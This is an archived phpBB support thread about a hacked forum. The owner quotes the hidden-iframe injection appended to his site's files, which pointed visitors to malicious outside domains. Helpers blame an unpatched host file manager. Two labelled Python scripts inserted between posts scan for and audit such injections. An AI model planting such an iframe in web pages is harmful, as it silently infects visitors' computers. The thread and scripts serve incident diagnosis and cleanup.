Found a trojan on my board

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Found a trojan on my board

Post by Remon » Thu Oct 02, 2008 5:41 pm

The last couple of days, multiple visitors of my phpBB forum have been reporting to me that they get a strange request to install RealPlayer and open PDF files.

That sounded strange to me, because HTML posting is disabled.

First I thought that the visitors' computers were infected with spyware, trojans and other crap. But I keep getting new reports, even from visitors with alternative browsers and Linux as the operating system.

So I decided to do some research, logged in to my host with an FTP client, and this is what I found:

Infected files, all changed on September 28, exactly at 4:34:00 AM:

/index.php
/admin/index.php
/cache/index.htm
/db/index.htm
/docs/CHANGELOG.html
/docs/codingstandards.htm
/docs/FAQ.html
/docs/INSTALL.html
/docs/README.html
/images/index.htm
/images/avatars/index.htm
/images/avatars/galery/index.htm
/includes/index.htm
/includes/page_header.php
/language/index.htm
/language/dutch/index.htm
/language/dutch/email/index.htm
/language/english/index.htm
/language/english/email/index.htm
/templates/index.htm
/templates/subSilver/index.htm
/templates/subSilver/admin/index.htm
/templates/subSilver/images/index.htm
/templates/subSilver/index.htm
/templates/subSilver_old/admin/index.htm
/templates/subSilver_old/images/index.htm

With the following code added on the last line:

Code:

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

While I tried to download one of these files, my virus scanner (McAfee) detected the trojan "JS/Tenia.d".

All files have CHMOD set to 644. Pretty safe, isn't it?

I have backups, so I can put everything back to normal, but I'm afraid that this can happen again. I've also contacted my hosting provider; maybe there's a trojan or worm on their servers.

This trojan is maybe written to infect phpBB boards, because there is one stranger among the infected files: page_header.php. That is typically a file of a phpBB board.

Other useful information:
Board is running phpBB 2.0.23
Address is http://www.radiohobby.nl, which is temporarily offline for the above reasons.
Last edited by ric323 on Thu Oct 09, 2008 9:45 pm, edited 1 time in total.
Reason: Topic icon changed

JimA
Community Team Leader
Posts: 7634
Joined: Thu Jul 31, 2008 5:54 am
Location: The Netherlands
Name: Jim Mossing Holsteyn
Contact:

Re: Found a trojan on my board

Post by JimA » Thu Oct 02, 2008 5:53 pm

Well, when I see this it seems to me that you're hacked. :(
Try to post a report in the Incident tracker and give all the information you think can help you, and see what will happen and what they say.
Jim Mossing Holsteyn - Community Team Leader
Knowledge Base | Documentation | Board rules

If you're having any questions about the rules/customs of this website, feel free to drop me a PM.

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Thu Oct 02, 2008 7:01 pm

I've found out that .htm/.html/.php files in non-public folders on the server are also infected.

Have to wait now until the hoster replies to me...

dkinzer
Registered User
Posts: 21
Joined: Mon Sep 05, 2005 3:20 am
Location: Portland, OR

Re: Found a trojan on my board

Post by dkinzer » Fri Oct 03, 2008 6:07 pm

Remon wrote: I've found out that .htm/.html/.php files in non-public folders on the server are also infected.
It is quite likely that you have a keylogger trojan or some other type of malware on the PC that you use to upload files to your host. By this means, the hackers can get your account's username/password and then modify files at will.

The first step is to change your account's master password and the password on all FTP logins that have the capability to modify files in the directories where you've found evidence. However, you must do this on a system that is known to be virus/trojan-free or it will be to no avail.

You should also review the state of your PC's security software. If it is outdated or if you are missing some key elements, you should take immediate steps to rectify that.
Don Kinzer
ZBasic Microcontrollers
http://www.zbasic.net

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Fri Oct 03, 2008 11:25 pm

Everything is secured to the maximum on my PCs.

Today I made a phone call to the hosting company; they told me that this issue is known and that over 50.000 pages are infected and 750 customers have the same problems as me...

They can't find the process that causes this, so they are still searching. The CEO even came back early from his holiday...

In the meantime they are also running a script that cuts the iframe out of all the pages, but that's a temporary solution, because the process can change the files again at any moment.
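
The two operational tasks in this thread, finding every web file that carries an appended hidden iframe (the opening post's list of infected files) and cutting the tag back out (the host's cleanup script), can be done with one small scanner. The script below is an added example for this thread, not phpBB code and not the host's script; the sample tree, its file contents and the placeholder domain `malicious.invalid` are constructed to mirror the structure of the injected tag quoted above. It records each hit's modification time so hits can be correlated against a known compromise window, and keeps a `.bak` copy before rewriting anything, because the modified files are evidence.

```python
"""Scan a web root for appended hidden-iframe injections and strip them.

Added example, not phpBB's or the host's code. All paths, sample contents
and domains below are constructed for illustration.
"""
import re
import shutil
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# One <iframe ...>...</iframe> element that is sized to zero or hidden, the
# shape of the injected tag quoted in the thread (width=0 height=0 style="hidden").
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?"
    r"(?:\bwidth\s*=\s*[\"']?0\b|\bheight\s*=\s*[\"']?0\b"
    r"|style\s*=\s*[\"'][^\"']*(?:hidden|display\s*:\s*none))"
    r"[^>]*>.*?</iframe\s*>",
    re.IGNORECASE | re.DOTALL,
)
WEB_SUFFIXES = {".php", ".htm", ".html"}


def find_injections(text: str) -> list:
    """Return every hidden iframe element found in text (empty list if clean)."""
    return [m.group(0) for m in HIDDEN_IFRAME.finditer(text)]


def strip_injections(text: str) -> tuple:
    """Remove hidden iframes; return (cleaned_text, number_removed)."""
    cleaned, n = HIDDEN_IFRAME.subn("", text)
    return cleaned, n


def scan_tree(root: Path) -> dict:
    """Report each web file under root that carries an injection, with its
    hit count, UTC mtime and the src URLs, keyed by path relative to root."""
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_SUFFIXES:
            continue
        hits = find_injections(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
            findings[path.relative_to(root).as_posix()] = {
                "count": len(hits),
                "mtime": mtime.isoformat(),
                "srcs": re.findall(r"src\s*=\s*[\"']?([^\"'\s>]+)", " ".join(hits), re.I),
            }
    return findings


def clean_tree(root: Path, dry_run: bool = True) -> int:
    """Strip injections from every hit; with dry_run=False the original is
    first copied to <name>.bak so the evidence survives. Returns tags removed."""
    removed = 0
    for rel in scan_tree(root):
        path = root / rel
        cleaned, n = strip_injections(path.read_text(encoding="utf-8", errors="replace"))
        if not dry_run:
            shutil.copy2(path, path.with_name(path.name + ".bak"))
            path.write_text(cleaned, encoding="utf-8")
        removed += n
    return removed


# Constructed sample: same attribute layout as the quoted tag, placeholder domain.
INJECTED_TAG = ('<iframe src="http://malicious.invalid/count.php?o=2" width=0 height=0 '
                'style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>')
SAMPLE_FILES = {
    "index.php": "<?php\ndefine('IN_PHPBB', true);\n?>\n" + INJECTED_TAG + INJECTED_TAG,
    "includes/page_header.php": "<?php\n// header\n?>\n" + INJECTED_TAG,
    "cache/index.htm": "<html><body>clean placeholder</body></html>\n",
    "images/logo.png": "binary placeholder, not a web file",
}


def demo() -> tuple:
    """Build the sample tree in a temp dir, scan, clean, re-scan."""
    root = Path(tempfile.mkdtemp())
    for rel, content in SAMPLE_FILES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(content, encoding="utf-8")
    before = scan_tree(root)
    removed = clean_tree(root, dry_run=False)
    after = len(scan_tree(root))
    shutil.rmtree(root)
    return before, removed, after


if __name__ == "__main__":
    print(demo())
```

Run with `dry_run=True` first and compare the reported mtimes against the timestamp the host gave; as the thread itself notes, stripping the tag is only a stopgap until the write path is closed, so the scan should be repeated after the host's fix.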

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Re: Found a trojan on my board

Post by espicom » Sat Oct 04, 2008 2:12 am

Classic sign of a compromised file manager on the server. The host didn't keep up with security updates, and someone managed to gain access to all files because of it. Older versions of cPanel have had this problem, and other file managers, too.

You're going to have to wait on the host, because anything you do is going to be overwritten by the next attack. The host has to secure the file manager and clean all the trojan horse programs out. I hope you have a recent, pre-attack backup of all your files and data, or that they do!
Jeff
Fixing 1016/1030/1034 Errors | (obsolete link) | MySQL 4.1/5.x Client Error | phpBBv2 Logo in ACP
Support requests via PM are ignored!
"To be fully alive is to feel that everything is possible." - Eric Hoffer

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Sat Oct 04, 2008 2:49 am

Thanks for your kind reply!

I have a backup of the files on the host, but is there any chance that the database is infected? The last SQL backup I made is dated the 22nd of September. On 2 October I disabled my board, which means 10 days are lost... :(

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Re: Found a trojan on my board

Post by espicom » Sat Oct 04, 2008 4:13 am

There is always a possibility, but the particular type of attack made (replacing index.* with infecting code) usually does not go after databases. It's a wild-card replacement of code, rather than specific programs to attack particular applications. Do a back up immediately, either way, because you can always clean out any infected messages or re-work any changed settings.
Jeff
Fixing 1016/1030/1034 Errors | (obsolete link) | MySQL 4.1/5.x Client Error | phpBBv2 Logo in ACP
Support requests via PM are ignored!
"To be fully alive is to feel that everything is possible." - Eric Hoffer

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Thu Oct 09, 2008 9:22 pm

My host cleaned up all the files and they found a solution so that this issue cannot happen again.

ric323
Former Team Member
Posts: 22909
Joined: Tue Feb 06, 2007 12:33 am
Location: Melbourne, Australia
Name: Ric
Contact:

Re: Found a trojan on my board

Post by ric323 » Thu Oct 09, 2008 9:44 pm

Remon wrote: My host cleaned up all the files and they found a solution so that this issue cannot happen again.
That means that they finally updated their old copy of the CPANEL application.
(CPANEL fixed it over two years ago...)
The Knowledge Base contains solutions to many common problems!
How to fix "Doesn't have a default value" and "Incorrect string value: xxx for column 'post_text' " errors.
How to do a clean re-install of the latest phpBB3 version.
Problems with permissions? Read phpBB3 Permissions

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Fri Oct 10, 2008 2:51 pm

I'm not sure about that.

They disabled allow_url_include in php.ini, and because of that PHP scripts can't open external links/images anymore... The update checker in the ACP didn't work with that, and my (upgraded to 3.0.2) board cannot get image information from external pictures to set the width and height...

Another ticket has been opened with customer support...

espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Re: Found a trojan on my board

Post by espicom » Mon Oct 13, 2008 12:06 am

You are right to be suspicious if they think disabling URL includes "fixes" the problem. Properly configured, even if PHP can include a URL outside the local machine, the web server should not be running at a privilege level that would allow it to overwrite any files that are not specifically set aside as "writable", nor would it be able to create any files outside of directories specifically set to allow that (i.e., the avatar upload directory, if you've enabled that feature).

And yet, someone was able to overwrite index.php... which means whatever method allowed access, it was running NOT as the same user as the web server SHOULD be running (a non-privileged user).

Keep your backups VERY current. And shop for a host that knows how to deal with security.
Jeff
Fixing 1016/1030/1034 Errors | (obsolete link) | MySQL 4.1/5.x Client Error | phpBBv2 Logo in ACP
Support requests via PM are ignored!
"To be fully alive is to feel that everything is possible." - Eric Hoffer
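
The rule in the post above is checkable: with the web server running as an unprivileged account, the only inodes that account should be able to write are the designated upload and cache locations. The audit below is an added example for this thread, not phpBB's or the host's code. It judges POSIX mode bits and ownership only (it cannot see ACLs, and root bypasses mode bits anyway), and reports writable directories as well as files, since a writable directory is enough to create new files there. The web account uid/gid, the allow-list and the sample tree in `demo()` are constructed; on a real host substitute the uid/gid the PHP processes actually run as.

```python
"""Audit which files and directories under a web root an unprivileged web
server account could write. Added example, not phpBB's or the host's code;
uids, gids, paths and modes in demo() are constructed for illustration.
"""
import os
import shutil
import stat
import tempfile
from pathlib import Path


def writable_by(st: os.stat_result, uid: int, gid: int):
    """Return 'owner', 'group' or 'other' if an account with this uid/gid could
    write the inode according to its mode bits, else None."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return "owner"
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return "group"
    if mode & stat.S_IWOTH:
        return "other"
    return None


def fake_stat(mode: int, uid: int, gid: int) -> os.stat_result:
    """Build a stat result by hand so writable_by() can be exercised without a filesystem."""
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))


def audit_writable(root: Path, web_uid: int, web_gid: int, allowed=()) -> list:
    """Walk root and list every file or directory the web account could write
    that is not inside an explicitly allowed writable location.
    Each finding is (relative_path, 'file'|'dir', reason, octal_mode)."""
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        if any(rel == a or rel.startswith(a + "/") for a in allowed):
            continue
        st = path.lstat()
        if stat.S_ISLNK(st.st_mode):
            continue  # a link's target is judged where it lives
        reason = writable_by(st, web_uid, web_gid)
        if reason:
            kind = "dir" if stat.S_ISDIR(st.st_mode) else "file"
            findings.append((rel, kind, reason, oct(stat.S_IMODE(st.st_mode))))
    return findings


# Hypothetical web server account (constructed); the allow-list names the only
# places a phpBB install needs the web account to write.
WEB_UID = 65534
WEB_GID = 65534
ALLOWED_WRITABLE = ("cache", "images/avatars/upload")

# Constructed layout: relative path -> (is_dir, mode). Every directory is listed
# so intermediate directories get an explicit mode regardless of umask.
LAYOUT = {
    "admin": (True, 0o755),
    "cache": (True, 0o777),                  # allowed, skipped
    "images": (True, 0o755),
    "images/avatars": (True, 0o755),
    "images/avatars/upload": (True, 0o777),  # allowed, skipped
    "includes": (True, 0o755),
    "includes/page_header.php": (False, 0o666),  # world-writable: flagged
    "index.php": (False, 0o644),             # owned by another uid, 644: fine
    "templates": (True, 0o777),              # world-writable dir: flagged
}


def demo() -> list:
    """Create the sample tree in a temp dir, audit it, remove it."""
    root = Path(tempfile.mkdtemp())
    for rel, (is_dir, mode) in LAYOUT.items():
        p = root / rel
        if is_dir:
            p.mkdir(parents=True, exist_ok=True)
        else:
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text("<?php // placeholder ?>\n")
        p.chmod(mode)
    try:
        return audit_writable(root, WEB_UID, WEB_GID, ALLOWED_WRITABLE)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print(*finding)
```

A clean result from this audit does not by itself rule out the scenario in the thread: as the post says, index.php was overwritten even though it was not writable by the web account, which points at a different account (the file manager or FTP login) doing the writing. The audit tells you what the web server could have touched; the mtimes and the host's logs tell you what actually wrote the files.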

Remon
Registered User
Posts: 54
Joined: Sun Feb 03, 2008 12:27 am
Contact:

Re: Found a trojan on my board

Post by Remon » Mon Oct 13, 2008 2:13 am

It's getting worse and worse; the host is blocking everything with a firewall. phpBB cannot read picture sizes and returns an error to the members...

And I just paid about 200 euro for October 2008 to October 2009... :cry:
